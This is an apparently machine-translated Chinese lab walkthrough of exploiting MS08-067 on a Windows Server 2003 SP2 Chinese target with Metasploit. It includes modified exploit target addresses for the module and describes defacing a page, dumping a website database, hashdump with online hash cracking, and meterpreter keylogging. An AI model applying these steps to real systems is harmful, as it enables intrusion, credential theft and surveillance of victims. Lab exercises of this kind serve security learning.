First, the test environment
Thunderbolt:Kali (NMAP+MSF)
target drone:Windows Server 2003 SP2 Chinese version
Exploit vulnerability: ms08_067
Second, the vulnerability description
The ms08-067 vulnerability is all known as the Windows Server service RPC request buffer Overflow vulnerability, which could allow remote code execution to be used for worm attacks if a user receives a specially crafted RPC request on an affected system. The affected systems are Microsoft Windows 2000, Windows XP, and Windows Server 2003.
Iii. penetration of the target
1, Nmap information collection, target open 445 port, there may be ms08_067 vulnerabilities.
try to use The MSF attack module MS08_067_NETAPI.RB The attack and failed several times after the test. Based on the information returned, you know that the target is Windows Server 2003 Chinese, and then switch to the following directory:/USR/SHARE/METASPLOIT-FRAMEWORK/MODULES/EXPLOITS/WINDOWS/SMB
Find the ms08_067_netapi.rb file, carefully read it again there is no Chinese version of the attack code.
So find Niang, finally borrowed from a big guy's article, the attack module slightly modified.
Make a backup of the original file:
Add the following code in MS08_067_NETAPI_SER2003_ZH.RB, in fact, modify the four Jump pointer address (extrapolate, other system ...) )。
[' Windows 2003 SP2 Chinese (NX) ',
{
' Retdec ' = 0x7c99beb8, # Dec ESI, ret @NTDLL. DLL (0X4EC3)
' Retpop ' = 0x7cb5e84e, # push ESI, pop EBP, ret @SHELL32. DLL (0X565DC3)
' Jmpesp ' = 0x7c99a01b, # jmp ESP @NTDLL. DLL (0XFFE4)
' DisableNX ' = 0x7c96f517, # NX disable @NTDLL. Dll
' Scratch ' = 0x00020408,
}
],
:
Find the module using the search command and use the module
Enter info to view the details of the module and find that the content of the first row has been added.
Show Options and set target IP and payload
Enter exploit to attack and find that the language is not recognized.
then set the target
Okay, there's a new problem, and the tip is that the previous attack crashed the target system.
Attempt to restart the target host, perform the same operation, and the attack succeeds.
System permissions
try echo A simple file, hang a black page
It worked
Find the database of the website, I this provides two kinds of ideas to carry off pants.
Enter back to the meterpreter interface.
1, switch to the site with the directory, directly echo or upload a trojan file, and then through the browser connection to take off pants.
2. Enter hashdump to obtain the hash value of all user passwords for the target host, and then decrypt the plaintext to get the pants off directly remotely.
3, Note: If the target host does not open 3389 port, please refer to:https://www.cnblogs.com/panisme/p/8341970.html
Copy this hash value:32ed87bdb5fdc5e9cba88547376818d4 to https:// www.somd5.com/ on the decryption,
get the administrator password plaintext, as shown in:
Of course , the function of Meterpreter far more than these, there are keylogger screenshots and so on ...
Here is the Keylogger test:
First PS View the process information that the target host is running.
then use migrate + PID to bind the corresponding process.
use Keyscan_start to start the keyboard monitoring,keyscan_dump Print the content obtained, and finally enter Keyscan_stop to end the keyboard monitoring.
****************
Four, reference:https://bbs.pediy.com/thread-186737.htm
Using the MSF ms08_067 module to attack Windows Server 2003 SP2 Chinese system